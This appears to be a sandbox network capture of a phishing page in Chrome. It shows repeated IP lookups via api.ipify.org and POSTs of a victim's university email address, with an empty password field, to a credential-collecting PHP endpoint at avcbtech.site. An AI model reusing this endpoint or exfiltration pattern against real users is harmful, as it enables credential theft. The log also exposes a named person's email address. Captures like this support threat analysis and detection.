2025-03-24 20:30:52 UTC	434	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:30:52 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9258edc9581e97b2-EWR server-timing: cfL4;desc="?proto=TCP&rtt=105883&min_rtt=103287&rtt_var=24485&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=36051&cwnd=251&unsent_bytes=0&cid=b01f31f0bb3491f3&ts=268&x=0"
2025-03-24 20:30:52 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49777	104.168.138.190	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:30:52 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=a55a58a1b05fe199d16ecb5a43f9ab60
2025-03-24 20:30:53 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:30:53 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 20:30:53 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49779	104.168.138.190	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:31:06 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 34 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:31:06 UTC	34	OUT	Data Raw: 61 69 3d 6b 72 69 73 74 61 2e 77 69 65 62 65 25 34 30 75 6d 61 6e 69 74 6f 62 61 2e 63 61 26 70 72 3d Data Ascii: ai=krista.wiebe%40umanitoba.ca&pr=
2025-03-24 20:31:06 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:31:06 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=70a0bb47acb1f505c751de4731110098; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 20:31:06 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49781	104.26.12.205	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:31:06 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:31:06 UTC	467	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:31:06 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9258ee23ad28ad1b-EWR server-timing: cfL4;desc="?proto=TCP&rtt=105528&min_rtt=105321&rtt_var=22390&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=35351&cwnd=240&unsent_bytes=0&cid=992fa6c6508453ff&ts=291&x=0"
2025-03-24 20:31:06 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49782	104.168.138.190	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:31:06 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=a55a58a1b05fe199d16ecb5a43f9ab60
2025-03-24 20:31:07 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:31:07 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 20:31:07 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49783	172.67.74.152	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:31:07 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:31:07 UTC	434	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:31:07 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9258ee26eebaacc5-EWR server-timing: cfL4;desc="?proto=TCP&rtt=106536&min_rtt=106273&rtt_var=22570&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=34991&cwnd=230&unsent_bytes=0&cid=552a4def8a05dc5c&ts=266&x=0"
2025-03-24 20:31:07 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49784	104.168.138.190	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:31:18 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 34 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:31:18 UTC	34	OUT	Data Raw: 61 69 3d 6b 72 69 73 74 61 2e 77 69 65 62 65 25 34 30 75 6d 61 6e 69 74 6f 62 61 2e 63 61 26 70 72 3d Data Ascii: ai=krista.wiebe%40umanitoba.ca&pr=
2025-03-24 20:31:18 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:31:18 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=04efa7454d6d284a2cd948a6c87ae4af; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 20:31:18 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49786	104.168.138.190	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:31:18 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=a55a58a1b05fe199d16ecb5a43f9ab60
2025-03-24 20:31:19 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:31:19 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 20:31:19 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49787	104.26.12.205	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:31:19 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:31:19 UTC	467	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:31:19 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9258ee73d88d9867-EWR server-timing: cfL4;desc="?proto=TCP&rtt=106453&min_rtt=106396&rtt_var=22530&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=34961&cwnd=252&unsent_bytes=0&cid=9f122621e5d86d0e&ts=275&x=0"
2025-03-24 20:31:19 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49788	104.26.12.205	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:31:20 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:31:20 UTC	434	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:31:20 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9258ee778df8e55d-EWR server-timing: cfL4;desc="?proto=TCP&rtt=105698&min_rtt=105224&rtt_var=22574&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=35141&cwnd=247&unsent_bytes=0&cid=68821ab9402fc8b0&ts=265&x=0"
2025-03-24 20:31:20 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49790	104.168.138.190	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:32:08 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 34 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:32:08 UTC	34	OUT	Data Raw: 61 69 3d 6b 72 69 73 74 61 2e 77 69 65 62 65 25 34 30 75 6d 61 6e 69 74 6f 62 61 2e 63 61 26 70 72 3d Data Ascii: ai=krista.wiebe%40umanitoba.ca&pr=
2025-03-24 20:32:09 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:32:08 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=610a1aa0cac93a34a7e89359eb0a6c51; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 20:32:09 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49792	104.26.12.205	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:32:08 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:32:09 UTC	467	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:32:09 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9258efa829c7377d-EWR server-timing: cfL4;desc="?proto=TCP&rtt=106712&min_rtt=106647&rtt_var=22595&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=34870&cwnd=246&unsent_bytes=0&cid=059db8528a70d9a9&ts=267&x=0"
2025-03-24 20:32:09 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49794	104.26.12.205	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:32:09 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:32:09 UTC	434	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:32:09 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9258efab2cb4247e-EWR server-timing: cfL4;desc="?proto=TCP&rtt=104568&min_rtt=100448&rtt_var=25460&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=37039&cwnd=242&unsent_bytes=0&cid=74bb2aaf432e0fd0&ts=253&x=0"
2025-03-24 20:32:09 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49793	104.168.138.190	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:32:09 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=a55a58a1b05fe199d16ecb5a43f9ab60
2025-03-24 20:32:09 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:32:09 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 20:32:09 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49795	104.168.138.190	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:32:17 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 34 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:32:17 UTC	34	OUT	Data Raw: 61 69 3d 6b 72 69 73 74 61 2e 77 69 65 62 65 25 34 30 75 6d 61 6e 69 74 6f 62 61 2e 63 61 26 70 72 3d Data Ascii: ai=krista.wiebe%40umanitoba.ca&pr=
2025-03-24 20:32:17 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:32:17 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=1a22f5f07cd4ead3949a507f6d6f2830; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 20:32:17 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49797	104.26.12.205	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:32:17 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:32:18 UTC	467	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:32:18 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9258efe10b931016-EWR server-timing: cfL4;desc="?proto=TCP&rtt=104744&min_rtt=102505&rtt_var=23932&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1121&delivery_rate=36319&cwnd=251&unsent_bytes=0&cid=173a34b8a293615e&ts=273&x=0"
2025-03-24 20:32:18 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49798	104.168.138.190	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:32:18 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=a55a58a1b05fe199d16ecb5a43f9ab60
2025-03-24 20:32:18 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:32:18 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 20:32:18 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
